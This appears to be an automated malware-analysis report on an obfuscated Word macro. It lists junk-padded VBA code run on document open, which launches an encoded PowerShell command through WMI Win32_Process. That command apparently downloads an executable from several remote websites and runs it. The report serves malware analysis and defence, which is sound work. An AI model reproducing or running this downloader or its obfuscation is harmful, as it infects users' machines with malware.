                                Part of subcall function u0rrBWd@zacGkX9: CDbl

                                Part of subcall function u0rrBWd@zacGkX9: qXfS4C1

                                Part of subcall function u0rrBWd@zacGkX9: Dzmx6W5

                                Part of subcall function u0rrBWd@zacGkX9: Log

                                Part of subcall function u0rrBWd@zacGkX9: Chr

                                Part of subcall function u0rrBWd@zacGkX9: gEpc77

                                Part of subcall function u0rrBWd@zacGkX9: Oct

                                Part of subcall function u0rrBWd@zacGkX9: oVggW7

                                Part of subcall function u0rrBWd@zacGkX9: DkPTA3642

                                Part of subcall function u0rrBWd@zacGkX9: Tan

                                Part of subcall function u0rrBWd@zacGkX9: xoJtPK2

                                Part of subcall function u0rrBWd@zacGkX9: Fix

                                Part of subcall function u0rrBWd@zacGkX9: mNOJc3

                                Part of subcall function u0rrBWd@zacGkX9: CInt

                                Part of subcall function u0rrBWd@zacGkX9: LtXxD6e6

                                Part of subcall function u0rrBWd@zacGkX9: mCtDS996

                                Part of subcall function u0rrBWd@zacGkX9: SQxNb0rO

                                Part of subcall function u0rrBWd@zacGkX9: DVTJJR1

                                Part of subcall function u0rrBWd@zacGkX9: xBkGD

                                Part of subcall function u0rrBWd@zacGkX9: ChrW

                                Part of subcall function u0rrBWd@zacGkX9: H49MOD

                                Part of subcall function u0rrBWd@zacGkX9: Sin

                                Part of subcall function u0rrBWd@zacGkX9: zpXA5n74

                                Part of subcall function u0rrBWd@zacGkX9: hRdz53zQ

                                Part of subcall function u0rrBWd@zacGkX9: EOPB1

                                Part of subcall function u0rrBWd@zacGkX9: zYE0jXuq

                                Part of subcall function u0rrBWd@zacGkX9: CByte

                                Part of subcall function u0rrBWd@zacGkX9: fYSpVZg

                                Part of subcall function u0rrBWd@zacGkX9: oWbX

                                Part of subcall function u0rrBWd@zacGkX9: CPCwcG

                                Part of subcall function u0rrBWd@zacGkX9: CreateObject

                                Part of subcall function u0rrBWd@zacGkX9: z6zhmi

                                Part of subcall function u0rrBWd@zacGkX9: hjL90Njk

                                Part of subcall function u0rrBWd@zacGkX9: YfUK5MYA

                                Part of subcall function u0rrBWd@zacGkX9: CRKhA_jf

                                Part of subcall function u0rrBWd@zacGkX9: Rnd

                                Part of subcall function u0rrBWd@zacGkX9: Cos

                                Part of subcall function u0rrBWd@zacGkX9: T26ck3A

                                Part of subcall function u0rrBWd@zacGkX9: Log

                                Part of subcall function u0rrBWd@zacGkX9: DMkD685A

                                Part of subcall function u0rrBWd@zacGkX9: WtgzQ71y4

                                Part of subcall function u0rrBWd@zacGkX9: xMfau5248

                                Part of subcall function u0rrBWd@zacGkX9: ChrB

                                Part of subcall function u0rrBWd@zacGkX9: pvOb

                                Part of subcall function u0rrBWd@zacGkX9: Round

                                Part of subcall function u0rrBWd@zacGkX9: npy

                                Part of subcall function u0rrBWd@zacGkX9: KYoI8IEt

                                Part of subcall function u0rrBWd@zacGkX9: oZgH7909

                                Part of subcall function u0rrBWd@zacGkX9: CDbl

                                Part of subcall function u0rrBWd@zacGkX9: qXfS4C1

                                Part of subcall function u0rrBWd@zacGkX9: Dzmx6W5

                                Part of subcall function u0rrBWd@zacGkX9: Log

                                Part of subcall function u0rrBWd@zacGkX9: Chr

                                Part of subcall function u0rrBWd@zacGkX9: gEpc77

                                Part of subcall function u0rrBWd@zacGkX9: Oct

                                Part of subcall function u0rrBWd@zacGkX9: oVggW7

                                Part of subcall function u0rrBWd@zacGkX9: DkPTA3642

                                Part of subcall function u0rrBWd@zacGkX9: Tan

                                Part of subcall function u0rrBWd@zacGkX9: xoJtPK2

                                Part of subcall function u0rrBWd@zacGkX9: Fix

                                Part of subcall function u0rrBWd@zacGkX9: mNOJc3

                                Part of subcall function u0rrBWd@zacGkX9: CInt

                                Part of subcall function u0rrBWd@zacGkX9: LtXxD6e6

                                Part of subcall function u0rrBWd@zacGkX9: mCtDS996

                                Part of subcall function u0rrBWd@zacGkX9: SQxNb0rO

                                Part of subcall function u0rrBWd@zacGkX9: DVTJJR1

                                Part of subcall function u0rrBWd@zacGkX9: xBkGD

                                Part of subcall function u0rrBWd@zacGkX9: ChrW

                                Part of subcall function u0rrBWd@zacGkX9: krL1ZhNF

                                Part of subcall function u0rrBWd@zacGkX9: Sin

                                Part of subcall function u0rrBWd@zacGkX9: zpXA5n74

                                Part of subcall function u0rrBWd@zacGkX9: hRdz53zQ

                                Part of subcall function u0rrBWd@zacGkX9: EOPB1

                                Part of subcall function u0rrBWd@zacGkX9: q7tYSW

                                Part of subcall function u0rrBWd@zacGkX9: CByte

                                Part of subcall function u0rrBWd@zacGkX9: fYSpVZg

                                Part of subcall function u0rrBWd@zacGkX9: oWbX

                                Part of subcall function u0rrBWd@zacGkX9: STzBUj60

                                Part of subcall function u0rrBWd@zacGkX9: idm89H

                                Part of subcall function u0rrBWd@zacGkX9: t_4HtlR2

                                Part of subcall function u0rrBWd@zacGkX9: GcQ0OP

                                Part of subcall function u0rrBWd@zacGkX9: E9KJrnE

                                Part of subcall function u0rrBWd@zacGkX9: riC9rvum

                                Part of subcall function u0rrBWd@zacGkX9: Swt5C6J5

                                Part of subcall function u0rrBWd@zacGkX9: R5QGHj5F

                                Part of subcall function u0rrBWd@zacGkX9: Rnd

                                Part of subcall function u0rrBWd@zacGkX9: Cos

                                Part of subcall function u0rrBWd@zacGkX9: l2NHvVM

                                Part of subcall function u0rrBWd@zacGkX9: Log

                                Part of subcall function u0rrBWd@zacGkX9: DMkD685A

                                Part of subcall function u0rrBWd@zacGkX9: WtgzQ71y4

                                Part of subcall function u0rrBWd@zacGkX9: xMfau5248

                                Part of subcall function u0rrBWd@zacGkX9: ChrB

                                Part of subcall function u0rrBWd@zacGkX9: pvOb

                                Part of subcall function u0rrBWd@zacGkX9: Round

                                Part of subcall function u0rrBWd@zacGkX9: npy

                                Part of subcall function u0rrBWd@zacGkX9: KYoI8IEt

                                Part of subcall function u0rrBWd@zacGkX9: oZgH7909

                                Part of subcall function u0rrBWd@zacGkX9: CDbl

                                Part of subcall function u0rrBWd@zacGkX9: qXfS4C1

                                Part of subcall function u0rrBWd@zacGkX9: Dzmx6W5

                                Part of subcall function u0rrBWd@zacGkX9: Log

                                Part of subcall function u0rrBWd@zacGkX9: Chr

                                Part of subcall function u0rrBWd@zacGkX9: gEpc77

                                Part of subcall function u0rrBWd@zacGkX9: Oct

                                Part of subcall function u0rrBWd@zacGkX9: oVggW7

                                Part of subcall function u0rrBWd@zacGkX9: DkPTA3642

                                Part of subcall function u0rrBWd@zacGkX9: Tan

                                Part of subcall function u0rrBWd@zacGkX9: xoJtPK2

                                Part of subcall function u0rrBWd@zacGkX9: Fix

                                Part of subcall function u0rrBWd@zacGkX9: mNOJc3

                                Part of subcall function u0rrBWd@zacGkX9: CInt

                                Part of subcall function u0rrBWd@zacGkX9: LtXxD6e6

                                Part of subcall function u0rrBWd@zacGkX9: mCtDS996

                                Part of subcall function u0rrBWd@zacGkX9: SQxNb0rO

                                Part of subcall function u0rrBWd@zacGkX9: DVTJJR1

                                Part of subcall function u0rrBWd@zacGkX9: xBkGD

                                Part of subcall function u0rrBWd@zacGkX9: ChrW

                                Part of subcall function u0rrBWd@zacGkX9: Vt1lB0J

                                Part of subcall function u0rrBWd@zacGkX9: Sin

                                Part of subcall function u0rrBWd@zacGkX9: zpXA5n74

                                Part of subcall function u0rrBWd@zacGkX9: hRdz53zQ

                                Part of subcall function u0rrBWd@zacGkX9: EOPB1

                                Part of subcall function u0rrBWd@zacGkX9: L_w6MRPL

                                Part of subcall function u0rrBWd@zacGkX9: CByte

                                Part of subcall function u0rrBWd@zacGkX9: fYSpVZg

                                Part of subcall function u0rrBWd@zacGkX9: oWbX

                                Part of subcall function u0rrBWd@zacGkX9: jUdkfc5

                                Part of subcall function u0rrBWd@zacGkX9: MYDp39w

                                Part of subcall function u0rrBWd@zacGkX9: Rnd

                                Part of subcall function u0rrBWd@zacGkX9: Cos

                                Part of subcall function u0rrBWd@zacGkX9: drcmu54

                                Part of subcall function u0rrBWd@zacGkX9: Log

                                Part of subcall function u0rrBWd@zacGkX9: DMkD685A

                                Part of subcall function u0rrBWd@zacGkX9: WtgzQ71y4

                                Part of subcall function u0rrBWd@zacGkX9: xMfau5248

                                Part of subcall function u0rrBWd@zacGkX9: ChrB

                                Part of subcall function u0rrBWd@zacGkX9: pvOb

                                Part of subcall function u0rrBWd@zacGkX9: Round

                                Part of subcall function u0rrBWd@zacGkX9: npy

                                Part of subcall function u0rrBWd@zacGkX9: KYoI8IEt

                                Part of subcall function u0rrBWd@zacGkX9: oZgH7909

                                Part of subcall function u0rrBWd@zacGkX9: CDbl

                                Part of subcall function u0rrBWd@zacGkX9: qXfS4C1

                                Part of subcall function u0rrBWd@zacGkX9: Dzmx6W5

                                Part of subcall function u0rrBWd@zacGkX9: Log

                                Part of subcall function u0rrBWd@zacGkX9: Chr

                                Part of subcall function u0rrBWd@zacGkX9: gEpc77

                                Part of subcall function u0rrBWd@zacGkX9: Oct

                                Part of subcall function u0rrBWd@zacGkX9: oVggW7

                                Part of subcall function u0rrBWd@zacGkX9: DkPTA3642

                                Part of subcall function u0rrBWd@zacGkX9: Tan

                                Part of subcall function u0rrBWd@zacGkX9: xoJtPK2

                                Part of subcall function u0rrBWd@zacGkX9: Fix

                                Part of subcall function u0rrBWd@zacGkX9: mNOJc3

                                Part of subcall function u0rrBWd@zacGkX9: CInt

                                Part of subcall function u0rrBWd@zacGkX9: LtXxD6e6

                                Part of subcall function u0rrBWd@zacGkX9: mCtDS996

                                Part of subcall function u0rrBWd@zacGkX9: SQxNb0rO

                                Part of subcall function u0rrBWd@zacGkX9: DVTJJR1

                                Part of subcall function u0rrBWd@zacGkX9: xBkGD

                                Part of subcall function u0rrBWd@zacGkX9: ChrW

                                Part of subcall function u0rrBWd@zacGkX9: Xi8u3HTl

                                Part of subcall function u0rrBWd@zacGkX9: Sin

                                Part of subcall function u0rrBWd@zacGkX9: zpXA5n74

                                Part of subcall function u0rrBWd@zacGkX9: hRdz53zQ

                                Part of subcall function u0rrBWd@zacGkX9: EOPB1

                                Part of subcall function u0rrBWd@zacGkX9: b67OEj8i

                                Part of subcall function u0rrBWd@zacGkX9: CByte

                                Part of subcall function u0rrBWd@zacGkX9: fYSpVZg

                                Part of subcall function u0rrBWd@zacGkX9: oWbX

                                Part of subcall function u0rrBWd@zacGkX9: zAZIDWEn

                                l78zbRfV

                                movZQtjv

                                Rnd

                                Cos

                                EAMc9D

                                Log

                                DMkD685A

                                WtgzQ71y4

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                ChrW

                                EkbiAj

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                XVBccQd

                                CByte

                                fYSpVZg

                                oWbX

                                WR_wPr3Y

                                StringsDecrypted Strings
                                " "
                                """"
                                "w i nm gmts:Win 32 _Pr oc ess"
                                LineInstructionMeta Information
                                2

                                Function vzVjQz()

                                3

                                On Error Resume Next

                                executed
                                5

                                G9zncq = (YVZLjB85 + Rnd(86) + (4222 + Cos(8992 * Rnd(UJ4Vqfvr) / 83 + Log(9130)) * 2 + 85))

                                YVZLjB85

                                Rnd

                                Cos

                                UJ4Vqfvr

                                Log

                                6

                                For Each iArs14 in DMkD685A

                                DMkD685A

                                7

                                For Each BVrY355a in WtgzQ71y4

                                WtgzQ71y4

                                8

                                LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(104 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                9

                                Next

                                WtgzQ71y4

                                10

                                Do

                                fYSpVZg

                                oWbX

                                11

                                fd61pMMd = 512 * ChrW(zTDlnFW) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (TlEu4dn + CByte(693))

                                ChrW

                                zTDlnFW

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                TlEu4dn

                                CByte

                                12

                                Loop Until fYSpVZg Eqv oWbX

                                fYSpVZg

                                oWbX

                                13

                                Next

                                DMkD685A

                                14

                                Set OU4wzDU_ = bWzdfi7

                                bWzdfi7

                                15

                                GS0LWK = zqzYlm3 + ThisDocument.McQHX3.Caption + ThisDocument.PWo3kW.Caption + ThisDocument.psYO9m.Caption + UR1S3b

                                zqzYlm3

                                McQHX3

                                PWo3kW

                                psYO9m

                                UR1S3b

                                16

                                On Error Resume Next

                                18

                                E8XQw6 = (bE0j9Ui5 + Rnd(338) + (4222 + Cos(8992 * Rnd(GLiWOi_) / 83 + Log(9130)) * 2 + 85))

                                bE0j9Ui5

                                Rnd

                                Cos

                                GLiWOi_

                                Log

                                19

                                For Each iArs14 in DMkD685A

                                DMkD685A

                                20

                                For Each BVrY355a in WtgzQ71y4

                                WtgzQ71y4

                                21

                                LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(731 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                22

                                Next

                                WtgzQ71y4

                                23

                                Do

                                fYSpVZg

                                oWbX

                                24

                                sJUOza = 512 * ChrW(nw28atwu) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (wdFzjT + CByte(693))

                                ChrW

                                nw28atwu

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                wdFzjT

                                CByte

                                25

                                Loop Until fYSpVZg Eqv oWbX

                                fYSpVZg

                                oWbX

                                26

                                Next

                                DMkD685A

                                27

                                Set vhuszR6 = rN2MG_

                                rN2MG_

                                28

                                On Error Resume Next

                                30

                                aC9tGX = (uUBMaP + Rnd(655) + (4222 + Cos(8992 * Rnd(fHOdUi) / 83 + Log(9130)) * 2 + 85))

                                uUBMaP

                                Rnd

                                Cos

                                fHOdUi

                                Log

                                31

                                For Each iArs14 in DMkD685A

                                DMkD685A

                                32

                                For Each BVrY355a in WtgzQ71y4

                                WtgzQ71y4

                                33

                                LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(895 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                34

                                Next

                                WtgzQ71y4

                                35

                                Do

                                fYSpVZg

                                oWbX

                                36

                                nUnKR8o = 512 * ChrW(YMtfHC) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (FoWIAw + CByte(693))

                                ChrW

                                YMtfHC

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                FoWIAw

                                CByte

                                37

                                Loop Until fYSpVZg Eqv oWbX

                                fYSpVZg

                                oWbX

                                38

                                Next

                                DMkD685A

                                39

                                Set c8_cpwB = zwuF49r

                                zwuF49r

                                41

                                RcTkkOqw = CreateObject(Replace("w i nm gmts:Win 32 _Pr oc ess", " ", "")).Create(GS0LWK + IEHlwRq, W8KjQY, u0rrBWd, l78zbRfV)

                                SWbemObjectEx.Create("powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=",,,) -> 0

                                IEHlwRq

                                W8KjQY

                                l78zbRfV

                                executed
                                42

                                On Error Resume Next

                                44

                                jTzFBB = (movZQtjv + Rnd(334) + (4222 + Cos(8992 * Rnd(EAMc9D) / 83 + Log(9130)) * 2 + 85))

                                movZQtjv

                                Rnd

                                Cos

                                EAMc9D

                                Log

                                45

                                For Each iArs14 in DMkD685A

                                DMkD685A

                                46

                                For Each BVrY355a in WtgzQ71y4

                                WtgzQ71y4

                                47

                                LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(664 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                48

                                Next

                                WtgzQ71y4

                                49

                                Do

                                fYSpVZg

                                oWbX

                                50

                                Ctpu4ftY = 512 * ChrW(EkbiAj) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (XVBccQd + CByte(693))

                                ChrW

                                EkbiAj

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                XVBccQd

                                CByte

                                51

                                Loop Until fYSpVZg Eqv oWbX

                                fYSpVZg

                                oWbX

                                52

                                Next

                                DMkD685A

                                53

                                Set s9NVwH = WR_wPr3Y

                                WR_wPr3Y

                                54

                                End Function

                                Module: zacGkX9

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "zacGkX9"

                                Executed Functions
                                Subroutine autoopen, APIs: 273, Strings: 0, Number of lines: 25, Relevance: 411.025
                                APIsMeta Information

                                QWhXZiV

                                Rnd

                                Cos

                                kf8CcM

                                Log

                                DMkD685A

                                WtgzQ71y4

                                xMfau5248

                                ChrB

                                pvOb

                                Round

                                npy

                                KYoI8IEt

                                oZgH7909

                                CDbl

                                qXfS4C1

                                Dzmx6W5

                                Log

                                Chr

                                gEpc77

                                Oct

                                oVggW7

                                DkPTA3642

                                Tan

                                xoJtPK2

                                Fix

                                mNOJc3

                                CInt

                                LtXxD6e6

                                mCtDS996

                                SQxNb0rO

                                DVTJJR1

                                xBkGD

                                ChrW

                                VlHilWoa

                                Sin

                                zpXA5n74

                                hRdz53zQ

                                EOPB1

                                MEz37an4

                                CByte

                                fYSpVZg

                                oWbX

                                wJlK3r

                                Part of subcall function vzVjQz@pGv5GKCO: YVZLjB85

                                Part of subcall function vzVjQz@pGv5GKCO: Rnd

                                Part of subcall function vzVjQz@pGv5GKCO: Cos

                                Part of subcall function vzVjQz@pGv5GKCO: UJ4Vqfvr

                                Part of subcall function vzVjQz@pGv5GKCO: Log

                                Part of subcall function vzVjQz@pGv5GKCO: DMkD685A

                                Part of subcall function vzVjQz@pGv5GKCO: WtgzQ71y4

                                Part of subcall function vzVjQz@pGv5GKCO: xMfau5248

                                Part of subcall function vzVjQz@pGv5GKCO: ChrB

                                Part of subcall function vzVjQz@pGv5GKCO: pvOb

                                Part of subcall function vzVjQz@pGv5GKCO: Round

                                Part of subcall function vzVjQz@pGv5GKCO: npy

                                Part of subcall function vzVjQz@pGv5GKCO: KYoI8IEt

                                Part of subcall function vzVjQz@pGv5GKCO: oZgH7909

                                Part of subcall function vzVjQz@pGv5GKCO: CDbl

                                Part of subcall function vzVjQz@pGv5GKCO: qXfS4C1

                                Part of subcall function vzVjQz@pGv5GKCO: Dzmx6W5

                                Part of subcall function vzVjQz@pGv5GKCO: Log

                                Part of subcall function vzVjQz@pGv5GKCO: Chr

                                Part of subcall function vzVjQz@pGv5GKCO: gEpc77

                                Part of subcall function vzVjQz@pGv5GKCO: Oct

                                Part of subcall function vzVjQz@pGv5GKCO: oVggW7

                                Part of subcall function vzVjQz@pGv5GKCO: DkPTA3642

                                Part of subcall function vzVjQz@pGv5GKCO: Tan

                                Part of subcall function vzVjQz@pGv5GKCO: xoJtPK2

                                Part of subcall function vzVjQz@pGv5GKCO: Fix

                                Part of subcall function vzVjQz@pGv5GKCO: mNOJc3

                                Part of subcall function vzVjQz@pGv5GKCO: CInt

                                Part of subcall function vzVjQz@pGv5GKCO: LtXxD6e6

                                Part of subcall function vzVjQz@pGv5GKCO: mCtDS996

                                Part of subcall function vzVjQz@pGv5GKCO: SQxNb0rO

                                Part of subcall function vzVjQz@pGv5GKCO: DVTJJR1

                                Part of subcall function vzVjQz@pGv5GKCO: xBkGD

                                Part of subcall function vzVjQz@pGv5GKCO: ChrW

                                Part of subcall function vzVjQz@pGv5GKCO: zTDlnFW

                                Part of subcall function vzVjQz@pGv5GKCO: Sin

                                Part of subcall function vzVjQz@pGv5GKCO: zpXA5n74

                                Part of subcall function vzVjQz@pGv5GKCO: hRdz53zQ

                                Part of subcall function vzVjQz@pGv5GKCO: EOPB1

                                Part of subcall function vzVjQz@pGv5GKCO: TlEu4dn

                                Part of subcall function vzVjQz@pGv5GKCO: CByte

                                Part of subcall function vzVjQz@pGv5GKCO: fYSpVZg

                                Part of subcall function vzVjQz@pGv5GKCO: oWbX

                                Part of subcall function vzVjQz@pGv5GKCO: bWzdfi7

                                Part of subcall function vzVjQz@pGv5GKCO: zqzYlm3

                                Part of subcall function vzVjQz@pGv5GKCO: McQHX3

                                Part of subcall function vzVjQz@pGv5GKCO: PWo3kW

                                Part of subcall function vzVjQz@pGv5GKCO: psYO9m

                                Part of subcall function vzVjQz@pGv5GKCO: UR1S3b

                                Part of subcall function vzVjQz@pGv5GKCO: bE0j9Ui5

                                Part of subcall function vzVjQz@pGv5GKCO: Rnd

                                Part of subcall function vzVjQz@pGv5GKCO: Cos

                                Part of subcall function vzVjQz@pGv5GKCO: GLiWOi_

                                Part of subcall function vzVjQz@pGv5GKCO: Log

                                Part of subcall function vzVjQz@pGv5GKCO: DMkD685A

                                Part of subcall function vzVjQz@pGv5GKCO: WtgzQ71y4

                                Part of subcall function vzVjQz@pGv5GKCO: xMfau5248

                                Part of subcall function vzVjQz@pGv5GKCO: ChrB

                                Part of subcall function vzVjQz@pGv5GKCO: pvOb

                                Part of subcall function vzVjQz@pGv5GKCO: Round

                                Part of subcall function vzVjQz@pGv5GKCO: npy

                                Part of subcall function vzVjQz@pGv5GKCO: KYoI8IEt

                                Part of subcall function vzVjQz@pGv5GKCO: oZgH7909

                                Part of subcall function vzVjQz@pGv5GKCO: CDbl

                                Part of subcall function vzVjQz@pGv5GKCO: qXfS4C1

                                Part of subcall function vzVjQz@pGv5GKCO: Dzmx6W5

                                Part of subcall function vzVjQz@pGv5GKCO: Log

                                Part of subcall function vzVjQz@pGv5GKCO: Chr

                                Part of subcall function vzVjQz@pGv5GKCO: gEpc77

                                Part of subcall function vzVjQz@pGv5GKCO: Oct

                                Part of subcall function vzVjQz@pGv5GKCO: oVggW7

                                Part of subcall function vzVjQz@pGv5GKCO: DkPTA3642

                                Part of subcall function vzVjQz@pGv5GKCO: Tan

                                Part of subcall function vzVjQz@pGv5GKCO: xoJtPK2

                                Part of subcall function vzVjQz@pGv5GKCO: Fix

                                Part of subcall function vzVjQz@pGv5GKCO: mNOJc3

                                Part of subcall function vzVjQz@pGv5GKCO: CInt

                                Part of subcall function vzVjQz@pGv5GKCO: LtXxD6e6

                                Part of subcall function vzVjQz@pGv5GKCO: mCtDS996

                                Part of subcall function vzVjQz@pGv5GKCO: SQxNb0rO

                                Part of subcall function vzVjQz@pGv5GKCO: DVTJJR1

                                Part of subcall function vzVjQz@pGv5GKCO: xBkGD

                                Part of subcall function vzVjQz@pGv5GKCO: ChrW

                                Part of subcall function vzVjQz@pGv5GKCO: nw28atwu

                                Part of subcall function vzVjQz@pGv5GKCO: Sin

                                Part of subcall function vzVjQz@pGv5GKCO: zpXA5n74

                                Part of subcall function vzVjQz@pGv5GKCO: hRdz53zQ

                                Part of subcall function vzVjQz@pGv5GKCO: EOPB1

                                Part of subcall function vzVjQz@pGv5GKCO: wdFzjT

                                Part of subcall function vzVjQz@pGv5GKCO: CByte

                                Part of subcall function vzVjQz@pGv5GKCO: fYSpVZg

                                Part of subcall function vzVjQz@pGv5GKCO: oWbX

                                Part of subcall function vzVjQz@pGv5GKCO: rN2MG_

                                Part of subcall function vzVjQz@pGv5GKCO: uUBMaP

                                Part of subcall function vzVjQz@pGv5GKCO: Rnd

                                Part of subcall function vzVjQz@pGv5GKCO: Cos

